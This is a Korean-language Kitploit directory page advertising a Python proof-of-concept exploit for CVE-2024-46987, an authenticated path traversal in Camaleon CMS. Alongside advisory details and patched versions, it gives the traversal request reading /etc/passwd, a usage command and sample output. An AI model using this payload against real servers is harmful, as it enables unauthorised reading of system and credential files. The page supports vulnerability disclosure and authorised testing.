Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-46987 — Python으로 생성된 Exploit | Kitploit
도구/GitHubGitHub/advaitpathak21/cve-2024-46987
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubadvaitpathak21/cve-2024-46987

CVE-2024-46987

Python으로 생성된 Exploit

저장소 보기
16개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-46987 – Camaleon CMS 인증된 경로 탐색 / 임의 파일 읽기

CVSS 7.7 High Python PoC

CVE-2024-46987는 Camaleon CMS (Ruby on Rails 기반 콘텐츠 관리 시스템)의 인증된 경로 탐색 취약점(CWE-22)입니다. 이 취약점을 통해 로그인한 사용자(낮은 권한만 가진 사용자라도)는 MediaController#download_private_file 액션을 통해 서버의 임의 파일을 읽을 수 있습니다.

  • 게시일: 2024년 9월 18일
  • CVSS v3.1: 7.7 높음
    벡터: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  • CWE: CWE-22 (제한된 디렉터리에 대한 경로명의 부적절한 제한), CWE-200 (민감한 정보 노출)
  • 영향을 받는 버전: Camaleon CMS ≤ 2.8.0 (일부 보고서에서는 2.9.0에서도 동작한다고 함)
  • 패치 버전: ≥ 2.8.2 (권장: 최신 2.8.x 또는 2.9.x로 업그레이드)
  • 권고:
    • GitHub Advisory GHSA-cp65-5m9r-vc2c
    • NVD CVE-2024-46987
    • GitHub Security Lab GHSL-2024-183

취약점 개요

유효한 자격 증명을 가진 공격자는 다음 경로로 조작된 요청을 보낼 수 있습니다: /admin/media/download_private_file?file=../../../../etc/passwd

요구 사항 설치

  • pip install -r requirements.txt

또는

  • pip install -r requests fire

사용법

  • 먼저 새 사용자를 생성합니다
root@kitploit:~
python cms-exploit.py \
  --url http://target.local \
  --username neal \
  --password 'Caffery@123' \
  --cmd /etc/passwd
  • 예시 출력:
root@kitploit:~
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.

참고: 이 스크립트는 Rails 스타일 로그인 양식(user[email], user[password], authenticity_token)을 가정합니다. 대상이 사용자 정의 이름을 사용하는 경우 페이로드 필드를 조정하세요.

법적 및 윤리적 경고

이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.

소유한 시스템 또는 테스트에 대한 명시적 서면 허가를 받은 시스템에서만 사용하십시오(예: 버그 바운티 프로그램, 내부 펜테스트, HTB와 같은 랩). 무단 사용은 법률을 위반할 수 있습니다. 저자는 오용에 대해 책임을 지지 않습니다.

도구 다운로드